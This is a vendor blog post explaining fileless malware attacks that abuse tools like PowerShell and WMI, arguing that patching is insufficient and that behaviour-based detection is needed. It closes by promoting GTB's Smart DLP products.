Taking on the Threat of Fileless Malware
Over the past two years, the IT industry has faced an important shift in the way cyber criminals go about their attacks.
Some of the biggest names in the field of cyber security have been tracking the growing threat of fileless malware attacks and the unique danger they pose to the digital sphere.
Under the Radar
Malware attacks can be divided into two broad categories:
Some hacks work by criminals installing malicious software on a computer--or tricking users into downloading it themselves. Once rooted into the computer’s system, the program can then execute its payload independently. In fileless attacks on the other hand, the malware infecting the machine is not a separate piece of software, but rather a toolkit that leverages applications already present on the machine. Programs ranging from operating system interfaces such as Microsoft's PowerShell or Windows Management Instrumentation (WMI), to common web browsers are used to execute malicious code on a machine.
The numbers on fileless malware’s upward trend have been disconcerting to say the least.
Researchers have estimated that nearly thirty percent of all attacks during 2017 involved fileless malware--up from 20 percent in 2016. IT leaders expect this number to rise to 35 percent over the current year.
The reason criminals prefer to go fileless is simply due to the effectiveness of these forms of malware. Fileless attacks are ten times more likely to succeed than file-based hacks. Because such attacks don't install new software on a user's computer, antivirus tools are more likely to miss them. This is because most cyber defense systems rely on signatures and other markers on programs and files to flag them as dangerous. If the program responsible for attacking the computer is not malicious software but rather an application already marked as “safe”, antivirus tools can be useless in detecting the problem.
Taking on the Threat
There are two approaches enterprises can take to address the danger posed by the rise of fileless malware:
Since fileless malware capitalizes on a user’s applications to do their dirty work, they rely on exploits present in these programs. To stay protected, experts have always emphasized staying on top of patching all of their standard programs including operating systems, task automation tools, shells, and browsers.
While keeping programs patched is a step in the right direction, it doesn’t quite go far enough in answering the threat of fileless attacks.
Patching is an important preventive measure, but it isn’t a full proof solution. Often businesses can be using unsupported programs for which patches aren’t even available. Human error can lead to IT personnel failing to timely patch company applications. Even the most meticulous patching practices won’t solve the zero day exploit problem, in which criminals are the first to discover a weakness. Even more fundamentally, patching doesn’t address the unique danger of fileless malware, namely, that these programs circumvent the conventional approach of antivirus detection if they do succeed in infecting a device.
To counter this feature of fileless attacks, behavior-based defense systems may be helpful.
Such solutions are not based on predetermined markers that identify threatening programs. Rather they detect suspicious patterns of behavior that indicate a system has been compromised. This is the one consistent weakness of fileless viruses, as these programs require the computer to execute highly unusual commands in strange orders and sequences.
GTB Gives Users the Edge
GTB’s Smart DLP solutions meet the fileless threat head-on. Artificially intelligent algorithms employ intelligent algorithms to identify the presence of malicious programs attempting to exfiltrate sensitive data on a system. This means even attacks with no “file footprint” cannot avoid detection.
GTB’s data protection solutions give companies the ability to maintain the highest control over all their data. Since the DLP programs can identify even partial data matches, managers remain alert to any attempts at data exfiltration. In this way, GTB’s systems address the insider threat as well, helping to insure that neither a company’s personnel nor its digital applications become the means for compromising data loss.